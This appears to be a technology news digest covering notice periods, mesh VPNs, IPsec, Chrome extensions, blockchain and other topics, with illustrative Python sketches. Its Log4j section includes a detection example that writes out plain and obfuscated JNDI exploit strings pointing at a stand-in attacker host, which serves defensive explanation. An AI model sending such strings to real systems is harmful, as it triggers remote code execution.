Do tech firms in India really need a 3 month notice period?

Experts have highlighted that a three-month notice period is costly for the company the candidate is leaving. Because the candidate already has one foot out of the door, their productivity drops, which costs the company time and resources. From the candidate’s point of view, a three-month notice period may hurt their chances of being hired by a new organisation, as the long gap between hiring and joining creates uncertainty. ... When asked for his take on the idea of a 15-day notice period for tech companies, the CEO of NetConnect Global, Mr Sunil Bist, said, “I think it is a great idea when you think about employee growth. After the pandemic, we have seen an acute competition spree to hire the right talent as soon as possible; a more extended notice period would mean losing out on it because of time constraints. ...” In his opinion, “The current norm of a 3 months notice period in most tech companies was started with good intentions, but what a company needs to see is whether it serves its intended purpose.”

Tailscale: A Virtual Private Network for Zero Trust Security

Unlike traditional hub-and-spoke VPN architectures, which send network traffic through a central gateway, Tailscale creates a peer-to-peer mesh network. This mesh topology connects each device directly to every other device. A hub-and-spoke architecture is simpler than a mesh, but it has some downsides: higher latency for remote users, no direct connections between individual nodes, harder scaling, and a single point of failure that can break the entire network. In contrast, a peer-to-peer mesh network offers lower latency and higher throughput and eliminates the need to manually configure port forwarding. It also allows for connection migration: existing connections are maintained even when switching to a different network, such as from Wi-Fi to wired. The idea of mesh VPNs has been around for a while, mostly for niche uses, but the advent of cloud-based infrastructure coupled with the rise in remote workers has made organizations take a closer look at them, wrote senior writer Lucian Constantin in CSO Online.
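To make the topology trade-off concrete, here is a small Python sketch that models a hypothetical four-node network both ways and counts links and hops, including what happens when the central gateway fails. The node names and the `hub_and_spoke`, `full_mesh`, and `hops` helpers are illustrative assumptions; this is a plain graph model and says nothing about how Tailscale actually establishes its peer-to-peer tunnels.

```python
from collections import deque
from itertools import combinations


def hub_and_spoke(nodes, hub):
    """Every node links only to the central gateway (hub)."""
    return {frozenset((hub, n)) for n in nodes if n != hub}


def full_mesh(nodes):
    """Every pair of nodes gets its own direct link."""
    return {frozenset(pair) for pair in combinations(nodes, 2)}


def hops(links, src, dst, down=frozenset()):
    """Breadth-first search: hops from src to dst, skipping failed nodes
    listed in `down`. Returns None if dst is unreachable."""
    adjacency = {}
    for link in links:
        a, b = tuple(link)
        if a in down or b in down:
            continue  # a failed node takes all of its links with it
        adjacency.setdefault(a, set()).add(b)
        adjacency.setdefault(b, set()).add(a)
    seen, queue = {src}, deque([(src, 0)])
    while queue:
        node, dist = queue.popleft()
        if node == dst:
            return dist
        for nxt in adjacency.get(node, ()):
            if nxt not in seen:
                seen.add(nxt)
                queue.append((nxt, dist + 1))
    return None


nodes = ["gateway", "laptop", "phone", "server"]  # hypothetical devices
hub = hub_and_spoke(nodes, "gateway")
mesh = full_mesh(nodes)
print(len(hub), len(mesh))                                            # 3 6
print(hops(hub, "laptop", "server"), hops(mesh, "laptop", "server"))  # 2 1
print(hops(hub, "laptop", "server", down={"gateway"}))                # None
print(hops(mesh, "laptop", "server", down={"gateway"}))               # 1
```

The cost shows up in the link count: a full mesh of n nodes needs n(n-1)/2 links versus n-1 for hub-and-spoke, so a mesh only stays manageable if link setup is automated rather than configured by hand.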

Researchers used electromagnetic signals to classify malware infecting IoT devices

The researchers proposed a novel approach that uses side-channel information to identify malware targeting IoT systems. The technique could allow analysts to determine malware type and identity even when the malicious code is heavily obfuscated to prevent static or symbolic binary analysis. ... The team analyzed power side-channel signals using Convolutional Neural Networks (CNNs) to detect malicious activity on IoT devices. The collected data is very noisy, so the researchers needed a preprocessing step to isolate the relevant, informative signals. This data was then used to train neural network models and machine learning algorithms to classify malware types, binaries, and obfuscation methods, and to detect the use of packers. In total, the academics recorded 100,000 measurement traces from an IoT device infected by various strains of malware and running realistic benign activity: 3,000 traces for each of 30 malware binaries (90,000) plus 10,000 traces of benign activity.
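The excerpt does not say what the preprocessing step was, so the following is only a generic illustration of the idea: smoothing a noisy trace with a moving average and then normalizing it to zero mean and unit variance, so traces recorded at different amplitudes become comparable before they reach a classifier. The function names, the window size of 8, and the synthetic sine-plus-noise trace are assumptions for this sketch, not the researchers' pipeline.

```python
import math
import random
import statistics


def moving_average(trace, window):
    """Smooth a trace with a simple moving average.
    The output has len(trace) - window + 1 samples."""
    if not 1 <= window <= len(trace):
        raise ValueError("window must be between 1 and len(trace)")
    out, acc = [], 0.0
    for i, x in enumerate(trace):
        acc += x
        if i >= window:
            acc -= trace[i - window]  # drop the sample that left the window
        if i >= window - 1:
            out.append(acc / window)
    return out


def zscore(trace):
    """Normalize to zero mean and unit variance."""
    mu = statistics.fmean(trace)
    sd = statistics.pstdev(trace) or 1.0  # avoid dividing by zero on a flat trace
    return [(x - mu) / sd for x in trace]


def preprocess(trace, window=8):
    """Hypothetical preprocessing: denoise first, then normalize."""
    return zscore(moving_average(trace, window))


random.seed(0)
# Synthetic stand-in for one captured trace: a slow signal buried in noise.
raw = [math.sin(i / 10) + random.gauss(0, 0.5) for i in range(200)]
clean = preprocess(raw)
print(len(clean))  # 193
```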

Microsoft Sees Rampant Log4j Exploit Attempts, Testing

Most recently, Microsoft has observed attackers obfuscating the HTTP requests made against targeted systems. Those requests generate a log entry using Log4j 2, which leverages the Java Naming and Directory Interface (JNDI) to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. Microsoft has observed many attacks in which the attacker-owned parameter is a DNS logging system, intended to log a request to the site in order to fingerprint vulnerable systems. The crafted string that enables Log4Shell exploitation contains “jndi”, followed by the protocol (such as “ldap”, “ldaps”, “rmi”, “dns”, “iiop”, or “http”) and then the attacker domain. But to evade detection, attackers are mixing up the request patterns: for example, Microsoft has seen exploit code that runs a lower or upper command within the exploitation string. Even more complicated obfuscation attempts are being made to try to bypass string-matching detections.
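Why does simple string matching fail? The Python sketch below compares a naive substring check with one that first expands Log4j's `${lower:x}` and `${upper:x}` lookups (innermost first, so nested lookups resolve too) before searching for `${jndi:` plus one of the protocols listed above. The helper names and the sample strings, including `attacker.example`, are hypothetical, and treating lookup names case-insensitively is an assumption. It deliberately ignores other obfuscation tricks such as `${env:...}` or default-value forms like `${::-j}`, so it illustrates the fragility of string matching rather than serving as a detector.

```python
import re

# A ${lower:...} or ${upper:...} lookup that contains no further nested lookup.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)

# "${jndi:" followed by one of the protocols named in Microsoft's write-up.
_JNDI = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|https?)://", re.IGNORECASE)


def resolve_case_lookups(s):
    """Repeatedly expand case lookups until the string stops changing."""
    while True:
        expanded = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower()
            if m.group(1).lower() == "lower"
            else m.group(2).upper(),
            s,
        )
        if expanded == s:
            return s
        s = expanded


def naive_match(s):
    """The kind of plain substring check that obfuscation defeats."""
    return "${jndi:ldap" in s.lower()


def looks_like_log4shell(s):
    """Match only after expanding the case lookups."""
    return bool(_JNDI.search(resolve_case_lookups(s)))


plain = "${jndi:ldap://attacker.example/a}"
obfuscated = "${${lower:j}ndi:${lower:l}${upper:d}a${lower:p}://attacker.example/a}"
print(naive_match(plain), naive_match(obfuscated))  # True False
print(resolve_case_lookups(obfuscated))             # ${jndi:lDap://attacker.example/a}
print(looks_like_log4shell(obfuscated))             # True
```

Note that the expanded string still contains mixed case ("lDap"), which is why the final pattern is matched case-insensitively.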

How IPsec works, its components and purpose

An IPsec VPN connection starts with the establishment of a Security Association (SA) between two communicating computers, or hosts. In general, this involves the exchange of cryptographic keys that will allow the parties to encrypt and decrypt their communication. (For more on how cryptography works in general, check out CSO's cryptography explainer.) The exact type of encryption used is negotiated between the two hosts automatically and will depend on their security goals within the CIA triad; for instance, you could encrypt messages to ensure message integrity ... The information about the SA is passed to the IPsec module running on each of the communicating hosts, and each host's IPsec module uses that information to modify every IP packet sent to the other host and to process similarly modified packets received in return. These modifications can affect both the packet’s header (metadata at the beginning of the packet explaining where the packet is going, where it came from, its length, and other information) and its payload, which is the actual data being sent.
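To illustrate what it means for each host's IPsec module to use SA information to modify outgoing packets and check incoming ones, here is a deliberately simplified Python sketch loosely modeled on ESP (Encapsulating Security Payload, RFC 4303) with NULL encryption and an HMAC-SHA-256 integrity check truncated to 128 bits. The `SecurityAssociation` class, the all-zero key, and the SPI value are hypothetical. Key exchange is assumed to have already happened, nothing is encrypted, and the anti-replay check is a simplified "highest sequence number seen" rule rather than the sliding window real implementations use. It is not a usable IPsec implementation.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass

ICV_LEN = 16  # HMAC-SHA-256 output truncated to 128 bits


@dataclass
class SecurityAssociation:
    """Hypothetical one-direction SA state; keys are assumed already agreed."""
    spi: int               # Security Parameter Index: tells the receiver which SA applies
    auth_key: bytes        # shared integrity key
    seq: int = 0           # last outbound sequence number used
    highest_seen: int = 0  # simplified anti-replay state for inbound packets


def protect(sa, payload, next_header=4):
    """Wrap a payload ESP-style: SPI, sequence number, payload, padding,
    pad length, next header, then the ICV. next_header=4 marks the payload
    as an IPv4 packet (tunnel mode)."""
    sa.seq += 1
    pad_len = -(len(payload) + 2) % 4       # align the trailer to 4 bytes
    padding = bytes(range(1, pad_len + 1))  # default pad bytes 1, 2, 3, ...
    body = (struct.pack("!II", sa.spi, sa.seq) + payload + padding
            + bytes([pad_len, next_header]))
    icv = hmac.new(sa.auth_key, body, hashlib.sha256).digest()[:ICV_LEN]
    return body + icv


def unprotect(sas, packet):
    """Verify and unwrap a packet produced by protect(); raises on failure."""
    body, icv = packet[:-ICV_LEN], packet[-ICV_LEN:]
    spi, seq = struct.unpack("!II", body[:8])
    sa = sas[spi]  # look up the SA by its SPI
    expected = hmac.new(sa.auth_key, body, hashlib.sha256).digest()[:ICV_LEN]
    if not hmac.compare_digest(icv, expected):
        raise ValueError("integrity check failed")
    if seq <= sa.highest_seen:
        raise ValueError("replayed packet")
    sa.highest_seen = seq
    pad_len = body[-2]
    return body[8:len(body) - 2 - pad_len]


key = bytes(32)  # placeholder key for illustration only
sender = SecurityAssociation(spi=0x1001, auth_key=key)
receiver = {0x1001: SecurityAssociation(spi=0x1001, auth_key=key)}
packet = protect(sender, b"inner IP packet")
print(unprotect(receiver, packet))  # b'inner IP packet'
```

Both the header fields (SPI, sequence number) and the payload are covered by the ICV, so altering either one on the wire makes the receiver reject the packet.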

Google makes the perfect case for why you shouldn't use Chrome

MV3 doesn't just create issues for end users; developers could face challenges as well. According to the EFF: "The changes in Manifest V3 won't stop malicious extensions but will hurt innovation, reduce extension capabilities and harm real-world performance. Google is right to ban remotely hosted code (with some exceptions for things like user scripts), but this is a policy change that didn't need to be bundled with the rest of Manifest V3." The EFF is spot on. Yes, Google should (with few exceptions) ban remote code. But releasing guidance that breaks so much functionality for third-party extensions isn't the way to go. For developers, this could mean maintaining two different code bases, one for Chrome and one for all other browsers. That's a proposition many devs won't accept. Is it in Google's best interest to prevent the development and usage of ad-blocking extensions? Probably not. But by creating guidance that prevents developers from building non-malicious (often helpful) add-ons, Google is putting itself in a rather awkward position.

breathing.ai Founder Hannes Bend on Improving Mental Health at Work in 2022

Developed based on extensive research, the breathing.ai Chrome extension is built on state-of-the-art machine learning that uses the webcam to detect breathing and heart rate, and to detect when the user may need a break from the screen and from work. Personalized break reminders take the form of breathwork, meditation, movement, or simply a suggested break from the screen, chosen according to which ones are the most calming or performance-improving. The more than 100 exercises include short deep-breathing sessions for breathwork, body scans for meditation, shoulder rolls for movement, or a short walk as a simple break from screens. All exercises are short practices of 20 seconds to 2 minutes, designed to build mindfulness and wellness into the daily flow. The extension also provides soothing background sounds. ... We are currently focused on making screens adaptive to vital signs, and our long-term vision and patent aim to create adaptive interfaces for audio and olfactory devices. Our interfaces, adaptive to the user’s nervous system, will be used not only for screens but also for voice assistants and other audio use cases, personalized diffusers and other olfactory devices, personalized IoT, cars, and all interface-based technological interactions.

Blockchain And You - How Will Blockchain Affect Your Future

Let’s look at a simple health care use case on a private blockchain. In this scenario, patient records are the data blocks, and the transactions that update the data blocks are the chains. This means that all patient information, and any updates made to it, are recorded in the data block. For example, the data block stores prescription information and the procedures performed on the patient. All the data in the data block is immutable and traceable. If the data block is shared with a designated party, that transaction is also traceable. Transferring a patient’s medical records from one hospital to another is easy and secure using blockchain. Additionally, since all the data blocks are immutable, the patient’s records can be used automatically as the input to future interactions. Think back to when we discussed filing insurance claims. The information in the patient’s record, such as medications or procedures, could automatically trigger insurance claims. The patient no longer needs to collect all their bills and determine which items might be covered by their insurance policy.
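The "immutable and traceable" property rests on hash-linking: each block stores the hash of the block before it, so quietly editing an old record breaks every later link. Here is a minimal Python sketch of that idea, assuming a single in-memory chain with one record per block (real blockchains usually bundle many transactions per block) and hypothetical record fields. It leaves out everything that makes a private blockchain work across several hospitals, such as consensus, digital signatures, and access control.

```python
import hashlib
import json
from dataclasses import dataclass

GENESIS = "0" * 64  # placeholder "previous hash" for the first block


@dataclass(frozen=True)
class Block:
    index: int
    record: dict     # e.g. a prescription or procedure entry (hypothetical fields)
    prev_hash: str   # hash of the previous block: this is what links the chain
    digest: str      # hash of this block's own contents


def block_hash(index, record, prev_hash):
    """Hash a canonical JSON encoding of the block's contents."""
    payload = json.dumps(
        {"index": index, "record": record, "prev": prev_hash}, sort_keys=True
    )
    return hashlib.sha256(payload.encode()).hexdigest()


def add_block(chain, record):
    prev = chain[-1].digest if chain else GENESIS
    idx = len(chain)
    chain.append(Block(idx, record, prev, block_hash(idx, record, prev)))


def verify(chain):
    """Recompute every hash; any edit to an earlier block breaks the links."""
    prev = GENESIS
    for i, b in enumerate(chain):
        if (b.index != i or b.prev_hash != prev
                or b.digest != block_hash(b.index, b.record, b.prev_hash)):
            return False
        prev = b.digest
    return True


chain = []
add_block(chain, {"patient": "P-001", "prescription": "amoxicillin 500 mg"})
add_block(chain, {"patient": "P-001", "procedure": "x-ray"})
print(verify(chain))  # True
chain[0].record["prescription"] = "amoxicillin 1000 mg"  # tamper with history
print(verify(chain))  # False
```

Strictly speaking, the hashes make tampering detectable rather than impossible; it is the replication of the chain across parties that makes a detected edit hard to get accepted.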

Top technology trends come down to CIO strategy in 2022



Generative AI (algorithms that assess existing data, such as text, audio or visual files, recognize the underlying patterns in that data and then replicate those patterns to generate similar content) is a top technology trend for CIOs to watch in 2022, Groombridge said. Generative AI can be used to discover new products in research and development settings, he said. "There have been uses of it to identify new medicines and it was even used to rapidly identify potential treatments for COVID, for example," he said. On the operational side of AI, Groombridge said it will be crucial for CIOs to pay attention to AI engineering, a discipline focused on designing systems and applications to better utilize and optimize AI in the enterprise. As businesses recognize AI's potential and rush to build products, they will likely encounter a new challenge: maintaining the AI algorithms. As the input data for models and the desired business outcomes change, the models themselves need adjusting. Lack of maintenance can cause AI algorithms to eventually lose value, Groombridge said.
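Maintenance starts with noticing that a model's input data has changed. One common way to quantify such drift for a single numeric feature is the Population Stability Index (PSI), which compares how a baseline sample and a recent sample are distributed across bins. The Python sketch below is an illustrative choice of metric, not a method attributed to Groombridge, and the data is synthetic. A commonly quoted rule of thumb treats PSI below 0.1 as stable and above 0.25 as significant drift, but those thresholds are heuristics.

```python
import math


def psi(expected, actual, bins=10, eps=1e-6):
    """Population Stability Index between a baseline sample (e.g. training
    inputs) and a recent sample of the same feature. Bins are equal-width
    over the baseline's range; out-of-range values land in the edge bins."""
    lo, hi = min(expected), max(expected)
    width = (hi - lo) / bins or 1.0  # guard against a constant baseline

    def shares(values):
        counts = [0] * bins
        for v in values:
            i = min(max(int((v - lo) / width), 0), bins - 1)
            counts[i] += 1
        # Floor at eps so empty bins don't produce log(0).
        return [max(c / len(values), eps) for c in counts]

    e, a = shares(expected), shares(actual)
    return sum((ai - ei) * math.log(ai / ei) for ei, ai in zip(e, a))


baseline = [i / 100 for i in range(100)]      # feature values seen at training time
recent = [0.5 + i / 200 for i in range(100)]  # same feature, drifted upward
print(psi(baseline, baseline))                # 0.0
print(psi(baseline, recent) > 0.25)           # True
```

A check like this only flags that inputs have shifted; deciding whether to retrain still depends on whether the model's accuracy on current data has actually dropped.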

How to create opportunities in the fragmented European marketplace

As the world continues to change and markets continue to develop, it is vital for market participants to ensure they can access the required markets and services within a given period of time, while also being able to move to locations where their presence is needed in order to stay ahead of their rivals. Nonetheless, new opportunities tend to emerge from transition. Changes allow organisations to re-evaluate their trading strategies, consider using new third-party service providers, such as hosting and infrastructure services, and think about how they can increase their operational efficiency as well as improve the overall trading experience. In these uncertain times, having access to a ready-made, up-to-standard trading ecosystem is both a necessity and a key differentiator for trading companies. The environment should have adaptive, on-demand connectivity that uses numerous flexible channels and solutions, as well as co-location services, so that connectivity can be provided to all major hubs.

Quote for the day:

Don’t be afraid to give up the good to go for the great. -- John D. Rockefeller
